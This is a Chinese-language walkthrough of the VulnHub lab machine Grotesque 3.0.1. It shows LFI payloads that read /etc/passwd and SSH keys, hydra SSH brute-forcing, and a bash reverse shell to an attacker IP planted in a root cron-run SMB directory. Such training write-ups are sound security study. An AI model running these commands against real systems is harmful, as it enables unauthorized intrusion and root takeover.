準備:
攻擊機:虛擬機器kali、本機win10。
靶機:Grotesque: 3.0.1,下載地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下載後直接vbox開啟即可。
知識點:ffuf引數爆破、定時任務、445埠利用、smbclient使用。
資訊收集:
透過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 172.20.10.0/24,獲得靶機地址:172.20.10.4。
掃描下埠對應的服務:nmap -T4 -sV -p- -A 172.20.10.4,顯示開放了22、80埠,開啟了ssh、http服務
目錄掃描:
使用dirmap進行目錄掃描,發現atlasg.jpg圖片,emmmm,訪問80埠的時候也能直接檢視到該圖片。
檢視該圖片利用steghide嘗試獲取隱藏資訊,但是獲取失敗,後來發現一個提示資訊:m、d和五個x,應該是告訴我們和md5有關。
根據提示生成一個md5字典,這裡我們將/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典進行md5加密,命令:for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。記得替換裡面的橫線和空格。然後使用gobuster進行目錄掃描,發現:/f66b22bf020334b04c7d0d3eb5010391.php。
引數名爆破:
訪問:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php無任何回顯資訊,原始碼資訊中也無任何資訊。因此嘗試使用ffuf進行引數爆破,命令:fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt,但是未掃描出來,然後更換字典,命令:ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt,發現了引數名:purpose。
爆破ssh密碼:
讀取/etc/passwd檔案,發現賬戶名:freddie。
使用檔案包含漏洞讀取下ssh私匙和公匙均讀取失敗,命令:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub,然後嘗試下使用md5字典爆破下ssh密碼,命令:hydra -l freddie -P dirmd5.txt ssh://172.20.10.4,成功獲得freddie賬戶的ssh登入密碼:61a4e3e60c063d1e472dd780f64e6cad。
獲取shell:
使用獲得賬戶名和密碼:freddie/61a4e3e60c063d1e472dd780f64e6cad進行ssh登入,命令:ssh freddie@172.20.10.4,在freddie使用者下發現user.txt檔案,讀取該檔案成功獲取到flag值。
提權:
檢視下當前賬戶是否存在可以使用的特權命令,sudo -l,顯示不存在。
透過:find / -perm -4000 -type f 2>/dev/null來查詢下是否存在可疑檔案,但是未發現可利用的漏洞。
檢視下當前裝置開放的埠資訊,命令:ss -nutl,發現了445埠。
在kali使用enum4linux 172.20.10.4和smbclient -L 172.20.10.4進行資訊收集均失敗,但是在靶機中smbclient -L 172.20.10.4執行成功,獲得一個目錄:grotesque。
進入該目錄檢視目錄資訊,命令:smbclient //127.0.0.1/grotesque,發現不存在檔案資訊。
下載pspy64檔案並透過http服務上傳到靶機,在靶機執行監控靶機的執行程式,發現靶機中每一分鐘會一root許可權執行smbshare目錄下的檔案。
在靶機中寫一個反彈shell的指令碼,內容:#!/bin/bash sh -i >& /dev/tcp/172.20.10.7/6688 0>&1。
利用剛才發現的共享資料夾:grotesque,將反彈shell指令碼上傳到smbshare目錄下,然後在kali端開啟對6688埠的監聽,成功獲得反彈的shell並在root目錄下讀取到flag值。